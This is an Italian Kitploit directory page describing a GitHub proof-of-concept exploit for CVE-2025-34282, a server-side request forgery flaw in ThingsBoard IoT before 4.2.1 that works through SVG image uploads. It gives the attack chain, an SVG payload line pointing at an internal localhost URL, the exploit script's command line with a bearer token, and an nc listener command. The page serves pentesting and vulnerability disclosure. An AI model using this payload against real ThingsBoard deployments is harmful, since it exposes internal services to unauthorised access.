Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
thingsboard-ssrf-cve-2025-34282 — Exploit PoC per CVE-2025-34282 - SSRF in ThingsBoard tramite caricamento di immagini SVG | Kitploit
Strumenti/GitHubGitHub/mathitam/thingsboard-ssrf-cve-2025-34282
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingRed Teaming
GitHubmathitam/thingsboard-ssrf-cve-2025-34282

thingsboard-ssrf-cve-2025-34282

Exploit PoC per CVE-2025-34282 - SSRF in ThingsBoard tramite caricamento di immagini SVG

Vedi Repository
35 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-34282 — SSRF di ThingsBoard tramite caricamento di immagini SVG

Panoramica

Vulnerabilità di Server-Side Request Forgery (SSRF) nella piattaforma IoT ThingsBoard nelle versioni precedenti alla 4.2.1.

Un attaccante con accesso Tenant Admin può caricare un file SVG appositamente modificato contenente un riferimento a un URL interno tramite la galleria di caricamento immagini. Quando ThingsBoard elabora l'SVG lato server, recupera l'URL referenziato — consentendo l'accesso a servizi interni non esposti a internet.

CampoDettagli
CVECVE-2025-34282
Versione interessata< 4.2.1
Versione corretta4.2.1
Punteggio CVSS6.9 Medio
CWECWE-918 (Server-Side Request Forgery)
Fornitorehttps://thingsboard.io

Catena di attacco

  1. Un Tenant Admin carica un SVG dannoso su POST /api/image
    • Il server elabora l'SVG e invia una richiesta in uscita all'URL incorporato
  2. Viene creato un widget personalizzato che incorpora il publicLink dell'SVG tramite un tag <object>
    • Anche il rendering del widget attiva il recupero lato server

Payload SVG

Il payload ssrf_localhost_5555.svg incorpora un riferimento a un URL interno:

root@kitploit:~
<image xlink:href="http://127.0.0.1:5555" x="0" y="0" width="600" height="450" />

Una volta caricato, il server di ThingsBoard recupera http://127.0.0.1:5555, confermando l'SSRF.

Utilizzo

Requisiti:

root@kitploit:~
pip install requests

Esecuzione:

root@kitploit:~
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py <svg_file> <bearer_token>

Esempio:

root@kitploit:~
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py ssrf_localhost_5555.svg eyJhbGci...

Avviare un listener per intercettare la callback SSRF prima di eseguire l'exploit:

root@kitploit:~
nc -l 5555

Riferimenti

  • https://www.cve.org/CVERecord?id=CVE-2025-34282

Autore

Tamil Mathi T.

Scarica lo strumento